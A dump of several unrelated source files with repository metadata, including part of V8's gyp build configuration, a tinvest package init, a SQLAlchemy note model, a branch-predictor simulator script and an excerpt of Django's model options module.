's390/code-stubs-s390.cc',
's390/code-stubs-s390.h',
's390/constants-s390.cc',
's390/constants-s390.h',
's390/cpu-s390.cc',
's390/deoptimizer-s390.cc',
's390/disasm-s390.cc',
's390/frames-s390.cc',
's390/frames-s390.h',
's390/interface-descriptors-s390.cc',
's390/macro-assembler-s390.cc',
's390/macro-assembler-s390.h',
's390/simulator-s390.cc',
's390/simulator-s390.h',
],
}],
['OS=="win"', {
'variables': {
'gyp_generators': '<!(echo $GYP_GENERATORS)',
},
'msvs_disabled_warnings': [4351, 4355, 4800],
# When building Official, the .lib is too large and exceeds the 2G
# limit. This breaks it into multiple pieces to avoid the limit.
# See http://crbug.com/485155.
'msvs_shard': 4,
}],
['component=="shared_library"', {
'defines': [
'BUILDING_V8_SHARED',
],
}],
['v8_postmortem_support=="true"', {
'sources': [
'<(SHARED_INTERMEDIATE_DIR)/debug-support.cc',
]
}],
['v8_enable_i18n_support==1', {
'dependencies': [
'<(icu_gyp_path):icui18n',
'<(icu_gyp_path):icuuc',
],
'conditions': [
['icu_use_data_file_flag==1', {
'defines': ['ICU_UTIL_DATA_IMPL=ICU_UTIL_DATA_FILE'],
}, { # else icu_use_data_file_flag !=1
'conditions': [
['OS=="win"', {
'defines': ['ICU_UTIL_DATA_IMPL=ICU_UTIL_DATA_SHARED'],
}, {
'defines': ['ICU_UTIL_DATA_IMPL=ICU_UTIL_DATA_STATIC'],
}],
],
}],
],
}, { # v8_enable_i18n_support==0
'sources!': [
'builtins/builtins-intl.cc',
'intl.cc',
'intl.h',
'objects/intl-objects.cc',
'objects/intl-objects-inl.h',
'objects/intl-objects.h',
'runtime/runtime-intl.cc',
],
}],
['OS=="win" and v8_enable_i18n_support==1', {
'dependencies': [
'<(icu_gyp_path):icudata',
],
}],
],
},
{
'target_name': 'v8_libbase',
'type': '<(component)',
'variables': {
'optimize': 'max',
},
'include_dirs+': [
'..',
],
'sources': [
'base/adapters.h',
'base/atomic-utils.h',
'base/atomicops.h',
'base/atomicops_internals_atomicword_compat.h',
'base/atomicops_internals_portable.h',
'base/atomicops_internals_x86_msvc.h',
'base/base-export.h',
'base/bits.cc',
'base/bits.h',
'base/build_config.h',
'base/compiler-specific.h',
'base/cpu.cc',
'base/cpu.h',
'base/division-by-constant.cc',
'base/division-by-constant.h',
'base/debug/stack_trace.cc',
'base/debug/stack_trace.h',
'base/file-utils.cc',
'base/file-utils.h',
'base/flags.h',
'base/format-macros.h',
'base/free_deleter.h',
'base/functional.cc',
'base/functional.h',
'base/hashmap.h',
'base/hashmap-entry.h',
'base/ieee754.cc',
'base/ieee754.h',
'base/iterator.h',
'base/lazy-instance.h',
'base/logging.cc',
'base/logging.h',
'base/macros.h',
'base/once.cc',
'base/once.h',
'base/platform/elapsed-timer.h',
'base/platform/time.cc',
'base/platform/time.h',
'base/platform/condition-variable.cc',
'base/platform/condition-variable.h',
'base/platform/mutex.cc',
'base/platform/mutex.h',
'base/platform/platform.h',
'base/platform/semaphore.cc',
'base/platform/semaphore.h',
'base/ring-buffer.h',
'base/safe_conversions.h',
'base/safe_conversions_impl.h',
'base/safe_math.h',
'base/safe_math_impl.h',
'base/sys-info.cc',
'base/sys-info.h',
'base/timezone-cache.h',
'base/utils/random-number-generator.cc',
'base/utils/random-number-generator.h',
],
'target_conditions': [
['OS=="android" and _toolset=="target"', {
'libraries': [
'-llog',
],
'include_dirs': [
'src/common/android/include',
],
}],
],
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}, {
'toolsets': ['target'],
}],
['component=="shared_library"', {
'defines': [
'BUILDING_V8_BASE_SHARED',
],
'direct_dependent_settings': {
'defines': [
'USING_V8_BASE_SHARED',
],
},
}],
['OS=="linux"', {
'link_settings': {
'libraries': [
'-ldl',
'-lrt'
],
},
'sources': [
'base/debug/stack_trace_posix.cc',
'base/platform/platform-linux.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc',
],
}
],
['OS=="android"', {
'sources': [
'base/debug/stack_trace_android.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc',
],
'link_settings': {
'target_conditions': [
['_toolset=="host" and host_os!="mac"', {
# Only include libdl and librt on host builds because they
# are included by default on Android target builds, and we
# don't want to re-include them here since this will change
# library order and break (see crbug.com/469973).
# These libraries do not exist on Mac hosted builds.
'libraries': [
'-ldl',
'-lrt'
]
}]
]
},
'conditions': [
['host_os=="mac"', {
'target_conditions': [
['_toolset=="host"', {
'sources': [
'base/platform/platform-macos.cc'
]
}, {
'sources': [
'base/platform/platform-linux.cc'
]
}],
],
}, {
'sources': [
'base/platform/platform-linux.cc'
]
}],
],
},
],
['OS=="qnx"', {
'link_settings': {
'target_conditions': [
['_toolset=="host" and host_os=="linux"', {
'libraries': [
'-lrt'
],
}],
['_toolset=="target"', {
'libraries': [
'-lbacktrace'
],
}],
],
},
'sources': [
'base/debug/stack_trace_posix.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc',
'base/qnx-math.h'
],
'target_conditions': [
['_toolset=="host" and host_os=="linux"', {
'sources': [
'base/platform/platform-linux.cc'
],
}],
['_toolset=="host" and host_os=="mac"', {
'sources': [
'base/platform/platform-macos.cc'
],
}],
['_toolset=="target"', {
'sources': [
'base/platform/platform-qnx.cc'
],
}],
],
},
],
['OS=="freebsd"', {
'link_settings': {
'libraries': [
'-L/usr/local/lib -lexecinfo',
]},
'sources': [
'base/debug/stack_trace_posix.cc',
'base/platform/platform-freebsd.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc',
],
}
],
['OS=="openbsd"', {
'link_settings': {
'libraries': [
'-L/usr/local/lib -lexecinfo',
]},
'sources': [
'base/platform/platform-openbsd.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc'
],
}
],
['OS=="netbsd"', {
'link_settings': {
'libraries': [
'-L/usr/pkg/lib -Wl,-R/usr/pkg/lib -lexecinfo',
]},
'sources': [
'base/debug/stack_trace_posix.cc',
'base/platform/platform-openbsd.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc',
],
}
],
['OS=="aix"', {
'sources': [
'base/debug/stack_trace_posix.cc',
'base/platform/platform-aix.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc'
]},
],
['OS=="solaris"', {
'link_settings': {
'libraries': [
'-lnsl -lrt',
]},
'sources': [
'base/debug/stack_trace_posix.cc',
'base/platform/platform-solaris.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc',
],
}
],
['OS=="mac"', {
'sources': [
'base/debug/stack_trace_posix.cc',
'base/platform/platform-macos.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc',
]},
],
['OS=="win"', {
'defines': [
'_CRT_RAND_S' # for rand_s()
],
'variables': {
'gyp_generators': '<!(echo $GYP_GENERATORS)',
},
'conditions': [
['gyp_generators=="make"', {
'variables': {
'build_env': '<!(uname -o)',
},
'conditions': [
['build_env=="Cygwin"', {
'sources': [
'base/debug/stack_trace_posix.cc',
'base/platform/platform-cygwin.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc',
],
}, {
'sources': [
'base/debug/stack_trace_win.cc',
'base/platform/platform-win32.cc',
'base/win32-headers.h',
],
}],
],
'link_settings': {
'libraries': [ '-lwinmm', '-lws2_32' ],
},
}, {
'sources': [
'base/debug/stack_trace_win.cc',
'base/platform/platform-win32.cc',
'base/win32-headers.h',
],
'msvs_disabled_warnings': [4351, 4355, 4800],
'link_settings': {
'libraries': [
'-ldbghelp.lib',
'-lshlwapi.lib',
'-lwinmm.lib',
'-lws2_32.lib'
],
},
}],
],
}],
],
},
{
'target_name': 'v8_libplatform',
'type': '<(component)',
'variables': {
'optimize': 'max',
},
'dependencies': [
'v8_libbase',
],
'include_dirs+': [
'..',
'<(DEPTH)',
'../include',
],
'sources': [
'../include/libplatform/libplatform.h',
'../include/libplatform/libplatform-export.h',
'../include/libplatform/v8-tracing.h',
'libplatform/default-platform.cc',
'libplatform/default-platform.h',
'libplatform/task-queue.cc',
'libplatform/task-queue.h',
'libplatform/tracing/trace-buffer.cc',
'libplatform/tracing/trace-buffer.h',
'libplatform/tracing/trace-config.cc',
'libplatform/tracing/trace-object.cc',
'libplatform/tracing/trace-writer.cc',
'libplatform/tracing/trace-writer.h',
'libplatform/tracing/tracing-controller.cc',
'libplatform/worker-thread.cc',
'libplatform/worker-thread.h',
],
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}, {
'toolsets': ['target'],
}],
['component=="shared_library"', {
'direct_dependent_settings': {
'defines': [ 'USING_V8_PLATFORM_SHARED' ],
},
'defines': [ 'BUILDING_V8_PLATFORM_SHARED' ],
}]
],
'direct_dependent_settings': {
'include_dirs': [
'../include',
],
},
},
{
'target_name': 'v8_libsampler',
'type': 'static_library',
'variables': {
'optimize': 'max',
},
'dependencies': [
'v8_libbase',
],
'include_dirs+': [
'..',
'../include',
],
'sources': [
'libsampler/sampler.cc',
'libsampler/sampler.h'
],
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}, {
'toolsets': ['target'],
}],
],
'direct_dependent_settings': {
'include_dirs': [
'../include',
],
},
},
{
'target_name': 'natives_blob',
'type': 'none',
'conditions': [
[ 'v8_use_external_startup_data==1', {
'conditions': [
['want_separate_host_toolset==1', {
'dependencies': ['js2c#host'],
}, {
'dependencies': ['js2c'],
}],
],
'actions': [{
'action_name': 'concatenate_natives_blob',
'inputs': [
'../tools/concatenate-files.py',
'<(SHARED_INTERMEDIATE_DIR)/libraries.bin',
'<(SHARED_INTERMEDIATE_DIR)/libraries-extras.bin',
'<(SHARED_INTERMEDIATE_DIR)/libraries-experimental-extras.bin',
],
'conditions': [
['want_separate_host_toolset==1', {
'target_conditions': [
['_toolset=="host"', {
'outputs': [
'<(PRODUCT_DIR)/natives_blob_host.bin',
],
'action': [
'python', '<@(_inputs)', '<(PRODUCT_DIR)/natives_blob_host.bin'
],
}, {
'outputs': [
'<(PRODUCT_DIR)/natives_blob.bin',
],
'action': [
'python', '<@(_inputs)', '<(PRODUCT_DIR)/natives_blob.bin'
],
}],
],
}, {
'outputs': [
'<(PRODUCT_DIR)/natives_blob.bin',
],
'action': [
'python', '<@(_inputs)', '<(PRODUCT_DIR)/natives_blob.bin'
],
}],
],
}],
}],
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}, {
'toolsets': ['target'],
}],
]
},
{
'target_name': 'js2c',
'type': 'none',
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host'],
}, {
'toolsets': ['target'],
}],
],
'variables': {
'library_files': [
'js/macros.py',
'messages.h',
'js/prologue.js',
'js/max-min.js',
'js/v8natives.js',
'js/array.js',
'js/string.js',
'js/typedarray.js',
'js/collection.js',
'js/weak-collection.js',
'js/collection-iterator.js',
'js/promise.js',
'js/messages.js',
'js/templates.js',
'js/spread.js',
'js/proxy.js',
'debug/mirrors.js',
'debug/debug.js',
'debug/liveedit.js',
],
'libraries_bin_file': '<(SHARED_INTERMEDIATE_DIR)/libraries.bin',
'libraries_extras_bin_file': '<(SHARED_INTERMEDIATE_DIR)/libraries-extras.bin',
'libraries_experimental_extras_bin_file': '<(SHARED_INTERMEDIATE_DIR)/libraries-experimental-extras.bin',
'conditions': [
['v8_enable_i18n_support==1', {
'library_files': ['js/intl.js'],
}],
],
},
'actions': [
{
'action_name': 'js2c',
'inputs': [
'../tools/js2c.py',
'<@(library_files)',
],
'outputs': ['<(SHARED_INTERMEDIATE_DIR)/libraries.cc'],
'action': [
'python',
'../tools/js2c.py',
'<(SHARED_INTERMEDIATE_DIR)/libraries.cc',
'CORE',
'<@(library_files)',
],
},
{
'action_name': 'js2c_bin',
'inputs': [
'../tools/js2c.py',
'<@(library_files)',
],
'outputs': ['<@(libraries_bin_file)'],
'action': [
'python',
'../tools/js2c.py',
'<(SHARED_INTERMEDIATE_DIR)/libraries.cc',
'CORE',
'<@(library_files)',
'--startup_blob', '<@(libraries_bin_file)',
'--nojs',
],
},
{
'action_name': 'js2c_extras',
'inputs': [
'../tools/js2c.py',
'<@(v8_extra_library_files)',
],
'outputs': ['<(SHARED_INTERMEDIATE_DIR)/extras-libraries.cc'],
'action': [
'python',
'../tools/js2c.py',
'<(SHARED_INTERMEDIATE_DIR)/extras-libraries.cc',
'EXTRAS',
'<@(v8_extra_library_files)',
],
},
{
'action_name': 'js2c_extras_bin',
'inputs': [
'../tools/js2c.py',
'<@(v8_extra_library_files)',
],
'outputs': ['<@(libraries_extras_bin_file)'],
'action': [
'python',
'../tools/js2c.py',
'<(SHARED_INTERMEDIATE_DIR)/extras-libraries.cc',
'EXTRAS',
'<@(v8_extra_library_files)',
'--startup_blob', '<@(libraries_extras_bin_file)',
'--nojs',
],
},
{
'action_name': 'js2c_experimental_extras',
'inputs': [
'../tools/js2c.py',
'<@(v8_experimental_extra_library_files)',
],
'outputs': [
'<(SHARED_INTERMEDIATE_DIR)/experimental-extras-libraries.cc',
],
'action': [
'python',
'../tools/js2c.py',
'<(SHARED_INTERMEDIATE_DIR)/experimental-extras-libraries.cc',
'EXPERIMENTAL_EXTRAS',
'<@(v8_experimental_extra_library_files)',
],
},
{
'action_name': 'js2c_experimental_extras_bin',
'inputs': [
'../tools/js2c.py',
'<@(v8_experimental_extra_library_files)',
],
'outputs': ['<@(libraries_experimental_extras_bin_file)'],
'action': [
'python',
'../tools/js2c.py',
'<(SHARED_INTERMEDIATE_DIR)/experimental-extras-libraries.cc',
'EXPERIMENTAL_EXTRAS',
'<@(v8_experimental_extra_library_files)',
'--startup_blob', '<@(libraries_experimental_extras_bin_file)',
'--nojs',
],
},
],
},
{
'target_name': 'postmortem-metadata',
'type': 'none',
'variables': {
'heapobject_files': [
'objects.h',
'objects-inl.h',
],
},
'actions': [
{
'action_name': 'gen-postmortem-metadata',
'inputs': [
'../tools/gen-postmortem-metadata.py',
'<@(heapobject_files)',
],
'outputs': [
'<(SHARED_INTERMEDIATE_DIR)/debug-support.cc',
],
'action': [
'python',
'../tools/gen-postmortem-metadata.py',
'<@(_outputs)',
'<@(heapobject_files)'
]
}
]
},
{
'target_name': 'mksnapshot',
'type': 'executable',
'dependencies': [
'v8_base',
'v8_libbase',
'v8_nosnapshot',
'v8_libplatform'
],
'include_dirs+': [
'..',
'<(DEPTH)',
],
'sources': [
'snapshot/mksnapshot.cc',
],
'conditions': [
['v8_enable_i18n_support==1', {
'dependencies': [
'<(icu_gyp_path):icui18n',
'<(icu_gyp_path):icuuc',
]
}],
['want_separate_host_toolset==1', {
'toolsets': ['host'],
}, {
'toolsets': ['target'],
}],
],
},
],
}
|
[
"commit-bot@chromium.org"
] |
commit-bot@chromium.org
|
919c64dbe119b1936ebd0513a95f570f70ef90a3
|
a1211018020bb564921e080c84063de275d0464b
|
/tinvest/__init__.py
|
3d9dd21ce1f65d685ea70fbaf556d524eb31ff79
|
[] |
no_license
|
pkosukhin/tinvest
|
3e0b30360c4f3f0a8710b8e7f79ec014182714f3
|
159a2dcb1aa6a23d64d3680f923c333a9e3add97
|
refs/heads/master
| 2022-04-19T05:37:25.304982
| 2020-04-06T14:36:21
| 2020-04-06T14:36:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,176
|
py
|
from .apis import MarketApi, OperationsApi, OrdersApi, PortfolioApi, SandboxApi, UserApi
from .async_client import AsyncClient
from .shemas import (
BrokerAccountType,
Candle,
CandleResolution,
Candles,
CandlesResponse,
CandleStreamingSchema,
Currencies,
Currency,
CurrencyPosition,
Empty,
Error,
ErrorStreamingSchema,
InstrumentInfoStreamingSchema,
InstrumentType,
LimitOrderRequest,
LimitOrderResponse,
MarketInstrument,
MarketInstrumentList,
MarketInstrumentListResponse,
MarketInstrumentResponse,
MarketOrderRequest,
MarketOrderResponse,
MoneyAmount,
Operation,
Operations,
OperationsResponse,
OperationStatus,
OperationTrade,
OperationType,
OperationTypeWithCommission,
Order,
Orderbook,
OrderbookResponse,
OrderbookStreamingSchema,
OrderResponse,
OrdersResponse,
OrderStatus,
OrderType,
PlacedLimitOrder,
PlacedMarketOrder,
Portfolio,
PortfolioCurrenciesResponse,
PortfolioPosition,
PortfolioResponse,
SandboxAccount,
SandboxCurrency,
SandboxRegisterRequest,
SandboxRegisterResponse,
SandboxSetCurrencyBalanceRequest,
SandboxSetPositionBalanceRequest,
SearchMarketInstrument,
SearchMarketInstrumentResponse,
TradeStatus,
UserAccount,
UserAccounts,
UserAccountsResponse,
)
from .streaming import Streaming, StreamingApi, StreamingEvents
from .sync_client import SyncClient
__all__ = (
# Http Clients
'AsyncClient',
'SyncClient',
# Streaming
'Streaming',
'StreamingApi',
'StreamingEvents',
# Streaming Schemas
'CandleStreamingSchema',
'ErrorStreamingSchema',
'InstrumentInfoStreamingSchema',
'OrderbookStreamingSchema',
# API Clients
'MarketApi',
'OperationsApi',
'OrdersApi',
'PortfolioApi',
'SandboxApi',
'UserApi',
# Schemas
'BrokerAccountType',
'Candle',
'CandleResolution',
'Candles',
'CandlesResponse',
'Currencies',
'Currency',
'CurrencyPosition',
'Empty',
'Error',
'InstrumentType',
'LimitOrderRequest',
'LimitOrderResponse',
'MarketInstrument',
'MarketInstrumentList',
'MarketInstrumentListResponse',
'MarketInstrumentResponse',
'MoneyAmount',
'MarketOrderRequest',
'MarketOrderResponse',
'Operation',
'OperationStatus',
'OperationTrade',
'OperationType',
'OperationTypeWithCommission',
'Operations',
'OperationsResponse',
'Order',
'OrderResponse',
'OrderStatus',
'OrderType',
'Orderbook',
'OrderbookResponse',
'OrdersResponse',
'PlacedLimitOrder',
'Portfolio',
'PortfolioCurrenciesResponse',
'PortfolioPosition',
'PortfolioResponse',
'PlacedMarketOrder',
'SandboxAccount',
'SandboxCurrency',
'SandboxSetCurrencyBalanceRequest',
'SandboxSetPositionBalanceRequest',
'SandboxRegisterRequest',
'SandboxRegisterResponse',
'SearchMarketInstrument',
'SearchMarketInstrumentResponse',
'TradeStatus',
'UserAccount',
'UserAccounts',
'UserAccountsResponse',
)
|
[
"daxartio@gmail.com"
] |
daxartio@gmail.com
|
3e9013d7774a42b2270147ac9583d70b9910f672
|
eac64fef132f7c463a9494fbbe0a058fffe1ad9d
|
/backend/app/app/database/models/note.py
|
69dc7275bed47ca017c2d1673517086c9df764a2
|
[
"MIT"
] |
permissive
|
bigSAS/fast-api-backend-starter
|
cdc7491a8275904597a3de53be14a4ea9d6e1779
|
21d92632e9c9668de461dd7f40156ae098765242
|
refs/heads/main
| 2023-05-30T23:44:18.334266
| 2021-07-10T08:46:15
| 2021-07-10T08:46:15
| 376,557,928
| 1
| 0
| null | 2021-07-08T17:35:32
| 2021-06-13T14:01:35
|
Python
|
UTF-8
|
Python
| false
| false
| 381
|
py
|
from sqlalchemy import Column, String, Integer, ForeignKey
from app.database.setup import Base
class Note(Base):
"""
Note entity. Import as NoteEntity.
"""
__tablename__ = "notes"
id = Column(Integer, primary_key=True, index=True)
title = Column(String, index=True)
description = Column(String)
owner_id = Column(Integer, ForeignKey("users.id"))
|
[
"sas.it.tomasz.majk@gmail.com"
] |
sas.it.tomasz.majk@gmail.com
|
32144e02682e87842d8d9e9d29e676dbf1182049
|
e196d0b8407fc69b5a50e88d457c1f613e1f2a8c
|
/tarea1_estructuras-de-compus_ii-master/Aux1.py
|
e9d4ed6fc5d57d12f0d97024f5d1756b5eddbd77
|
[] |
no_license
|
Marlon-Lazo-Coronado/Estructuras_Compus_II
|
8f4a85f4290af55453a9c0160d13e64add722ee6
|
7fa7a8d69fb52bfcd045fec4c270dfe4ccb7a33e
|
refs/heads/main
| 2023-06-29T23:26:37.269396
| 2021-08-04T02:45:02
| 2021-08-04T02:45:02
| 392,504,625
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,163
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
def Aux11(state,a,line,Xhistoria,BHT,PHT):
bandera=0
#print(C)
#len(C)
paso=0
if paso==0:
error = line[11]
if error == " ":
t=int(line[0:11])
else:
t=int(line[0:10])
p = t & ((2**a)-1) # Mascara para la direcion filtrad
#print(bin(p))
#print(p)
#print(line)
#Se plantean todos los posibles casos que se pueden dar cuando se toma el estados
# y se hace dos veces porque algunas veces la linea tiene 9 0 10 digitos
#Se manipula el vector de estados
historia = PHT[p]
#print(historia)
direccion = historia ^ p
temp=BHT[direccion]
state=BHT[direccion]
# Si tienemos 12 espacios en la linea
if line[10] == " ": # Saltos no tomados
if ((temp == 0) & (line[11]=="N")):
# Hacer el desplazamiento
PHT[p] = ((historia << 1) & (Xhistoria))
bandera=1
if ((temp == 1) & (line[11]=="N")):
state = state - 1
BHT[direccion] = state
PHT[p] = ((historia << 1) & (Xhistoria))
bandera=1
if ((temp == 2) & (line[11]=="N")):
state = state - 1
BHT[direccion] = state
PHT[p] = ((historia << 1) & (Xhistoria))
bandera=0
if ((temp == 3) & (line[11]=="N")):
state = state - 1
BHT[direccion] = state
PHT[p] = ((historia << 1) & (Xhistoria))
bandera=0
# Saltos tomados
if ((temp == 0) & (line[11]=="T")):
state = state + 1
BHT[direccion] = state
PHT[p] = (((historia << 1) & (Xhistoria)) | 1)
bandera=0
if ((temp == 1) & (line[11]=="T")):
state = state + 1
BHT[direccion] = state
PHT[p] = (((historia << 1) & (Xhistoria)) | 1)
bandera=0
if ((temp == 2) & (line[11]=="T")):
state = state + 1
BHT[direccion] = state
PHT[p] = (((historia << 1) & (Xhistoria)) | 1)
bandera=1
if ((temp == 3) & (line[11]=="T")):
PHT[p] = (((historia << 1) & (Xhistoria)) | 1)
bandera=1
# Si tienemos 12 espacios en la linea
else: # Saltos no tomados
if ((temp == 0) & (line[10]=="N")):
PHT[p] = ((historia << 1) & (Xhistoria))
bandera=1
if ((temp == 1) & (line[10]=="N")):
state = state - 1
BHT[direccion] = state
PHT[p] = ((historia << 1) & (Xhistoria))
bandera=1
if ((temp == 2) & (line[10]=="N")):
state = state - 1
BHT[direccion] = state
PHT[p] = ((historia << 1) & (Xhistoria))
bandera=0
if ((temp == 3) & (line[10]=="N")):
state = state - 1
BHT[direccion] = state
PHT[p] = ((historia << 1) & (Xhistoria))
bandera=0
# Saltos tomados
if ((temp == 0) & (line[10]=="T")):
state = state + 1
BHT[direccion] = state
PHT[p] = (((historia << 1) & (Xhistoria)) | 1)
bandera=0
if ((temp == 1) & (line[10]=="T")):
state = state + 1
BHT[direccion] = state
PHT[p] = (((historia << 1) & (Xhistoria)) | 1)
bandera=0
if ((temp == 2) & (line[10]=="T")):
state = state + 1
BHT[direccion] = state
PHT[p] = (((historia << 1) & (Xhistoria)) | 1)
bandera=1
if ((temp == 3) & (line[10]=="T")):
PHT[p] = (((historia << 1) & (Xhistoria)) | 1)
bandera=1
return bandera
|
[
"noreply@github.com"
] |
Marlon-Lazo-Coronado.noreply@github.com
|
1d7defe0dd95cb7c5299a83beefa61777183b3fd
|
ed0f9eb0c1cb4858d91ef7e2d435db307f23a5a5
|
/dist/manage/django/db/models/options.py
|
ee34b3d807cd1788fca322da2dd5e8a8cc2481bf
|
[] |
no_license
|
hjlhehehe123/ATC_Data
|
81b4622e7279aa9cc2013db8cc5a71d33561e768
|
ad35e61afb8e87d8bab2d2b3aeea08e9409d56c0
|
refs/heads/master
| 2023-07-13T16:23:45.951584
| 2021-08-20T12:37:34
| 2021-08-20T12:37:34
| 256,994,694
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 35,502
|
py
|
import bisect
import copy
import inspect
from collections import defaultdict
from django.apps import apps
from django.conf import settings
from django.core.exceptions import FieldDoesNotExist
from django.db import connections
from django.db.models import AutoField, Manager, OrderWrt, UniqueConstraint
from django.db.models.query_utils import PathInfo
from django.utils.datastructures import ImmutableList, OrderedSet
from django.utils.functional import cached_property
from django.utils.text import camel_case_to_spaces, format_lazy
from django.utils.translation import override
PROXY_PARENTS = object()
EMPTY_RELATION_TREE = ()
IMMUTABLE_WARNING = (
"The return type of '%s' should never be mutated. If you want to manipulate this list "
"for your own use, make a copy first."
)
DEFAULT_NAMES = (
'verbose_name', 'verbose_name_plural', 'db_table', 'ordering',
'unique_together', 'permissions', 'get_latest_by', 'order_with_respect_to',
'app_label', 'db_tablespace', 'abstract', 'managed', 'proxy', 'swappable',
'auto_created', 'index_together', 'apps', 'default_permissions',
'select_on_save', 'default_related_name', 'required_db_features',
'required_db_vendor', 'base_manager_name', 'default_manager_name',
'indexes', 'constraints',
)
def normalize_together(option_together):
"""
option_together can be either a tuple of tuples, or a single
tuple of two strings. Normalize it to a tuple of tuples, so that
calling code can uniformly expect that.
"""
try:
if not option_together:
return ()
if not isinstance(option_together, (tuple, list)):
raise TypeError
first_element = option_together[0]
if not isinstance(first_element, (tuple, list)):
option_together = (option_together,)
# Normalize everything to tuples
return tuple(tuple(ot) for ot in option_together)
except TypeError:
# If the value of option_together isn't valid, return it
# verbatim; this will be picked up by the check framework later.
return option_together
def make_immutable_fields_list(name, data):
return ImmutableList(data, warning=IMMUTABLE_WARNING % name)
class Options:
FORWARD_PROPERTIES = {
'fields', 'many_to_many', 'concrete_fields', 'local_concrete_fields',
'_forward_fields_map', 'managers', 'managers_map', 'base_manager',
'default_manager',
}
REVERSE_PROPERTIES = {'related_objects', 'fields_map', '_relation_tree'}
default_apps = apps
def __init__(self, meta, app_label=None):
self._get_fields_cache = {}
self.local_fields = []
self.local_many_to_many = []
self.private_fields = []
self.local_managers = []
self.base_manager_name = None
self.default_manager_name = None
self.model_name = None
self.verbose_name = None
self.verbose_name_plural = None
self.db_table = ''
self.ordering = []
self._ordering_clash = False
self.indexes = []
self.constraints = []
self.unique_together = []
self.index_together = []
self.select_on_save = False
self.default_permissions = ('add', 'change', 'delete', 'view')
self.permissions = []
self.object_name = None
self.app_label = app_label
self.get_latest_by = None
self.order_with_respect_to = None
self.db_tablespace = settings.DEFAULT_TABLESPACE
self.required_db_features = []
self.required_db_vendor = None
self.meta = meta
self.pk = None
self.auto_field = None
self.abstract = False
self.managed = True
self.proxy = False
# For any class that is a proxy (including automatically created
# classes for deferred object loading), proxy_for_model tells us
# which class this model is proxying. Note that proxy_for_model
# can create a chain of proxy models. For non-proxy models, the
# variable is always None.
self.proxy_for_model = None
# For any non-abstract class, the concrete class is the model
# in the end of the proxy_for_model chain. In particular, for
# concrete models, the concrete_model is always the class itself.
self.concrete_model = None
self.swappable = None
self.parents = {}
self.auto_created = False
# List of all lookups defined in ForeignKey 'limit_choices_to' options
# from *other* models. Needed for some admin checks. Internal use only.
self.related_fkey_lookups = []
# A custom app registry to use, if you're making a separate model set.
self.apps = self.default_apps
self.default_related_name = None
@property
def label(self):
return '%s.%s' % (self.app_label, self.object_name)
@property
def label_lower(self):
return '%s.%s' % (self.app_label, self.model_name)
@property
def app_config(self):
# Don't go through get_app_config to avoid triggering imports.
return self.apps.app_configs.get(self.app_label)
@property
def installed(self):
return self.app_config is not None
def contribute_to_class(self, cls, name):
from django.db import connection
from django.db.backends.utils import truncate_name
cls._meta = self
self.model = cls
# First, construct the default values for these options.
self.object_name = cls.__name__
self.model_name = self.object_name.lower()
self.verbose_name = camel_case_to_spaces(self.object_name)
# Store the original user-defined values for each option,
# for use when serializing the model definition
self.original_attrs = {}
# Next, apply any overridden values from 'class Meta'.
if self.meta:
meta_attrs = self.meta.__dict__.copy()
for name in self.meta.__dict__:
# Ignore any private attributes that Django doesn't care about.
# NOTE: We can't modify a dictionary's contents while looping
# over it, so we loop over the *original* dictionary instead.
if name.startswith('_'):
del meta_attrs[name]
for attr_name in DEFAULT_NAMES:
if attr_name in meta_attrs:
setattr(self, attr_name, meta_attrs.pop(attr_name))
self.original_attrs[attr_name] = getattr(self, attr_name)
elif hasattr(self.meta, attr_name):
setattr(self, attr_name, getattr(self.meta, attr_name))
self.original_attrs[attr_name] = getattr(self, attr_name)
self.unique_together = normalize_together(self.unique_together)
self.index_together = normalize_together(self.index_together)
# App label/class name interpolation for names of constraints and
# indexes.
if not getattr(cls._meta, 'abstract', False):
for attr_name in {'constraints', 'indexes'}:
objs = getattr(self, attr_name, [])
setattr(self, attr_name, self._format_names_with_class(cls, objs))
# verbose_name_plural is a special case because it uses a 's'
# by default.
if self.verbose_name_plural is None:
self.verbose_name_plural = format_lazy('{}s', self.verbose_name)
# order_with_respect_and ordering are mutually exclusive.
self._ordering_clash = bool(self.ordering and self.order_with_respect_to)
# Any leftover attributes must be invalid.
if meta_attrs != {}:
raise TypeError("'class Meta' got invalid attribute(s): %s" % ','.join(meta_attrs))
else:
self.verbose_name_plural = format_lazy('{}s', self.verbose_name)
del self.meta
# If the db_table wasn't provided, use the app_label + model_name.
if not self.db_table:
self.db_table = "%s_%s" % (self.app_label, self.model_name)
self.db_table = truncate_name(self.db_table, connection.ops.max_name_length())
def _format_names_with_class(self, cls, objs):
"""App label/class name interpolation for object names."""
new_objs = []
for obj in objs:
obj = obj.clone()
obj.name = obj.name % {
'app_label': cls._meta.app_label.lower(),
'class': cls.__name__.lower(),
}
new_objs.append(obj)
return new_objs
def _prepare(self, model):
if self.order_with_respect_to:
# The app registry will not be ready at this point, so we cannot
# use get_field().
query = self.order_with_respect_to
try:
self.order_with_respect_to = next(
f for f in self._get_fields(reverse=False)
if f.name == query or f.attname == query
)
except StopIteration:
raise FieldDoesNotExist("%s has no field named '%s'" % (self.object_name, query))
self.ordering = ('_order',)
if not any(isinstance(field, OrderWrt) for field in model._meta.local_fields):
model.add_to_class('_order', OrderWrt())
else:
self.order_with_respect_to = None
if self.pk is None:
if self.parents:
# Promote the first parent link in lieu of adding yet another
# field.
field = next(iter(self.parents.values()))
# Look for a local field with the same name as the
# first parent link. If a local field has already been
# created, use it instead of promoting the parent
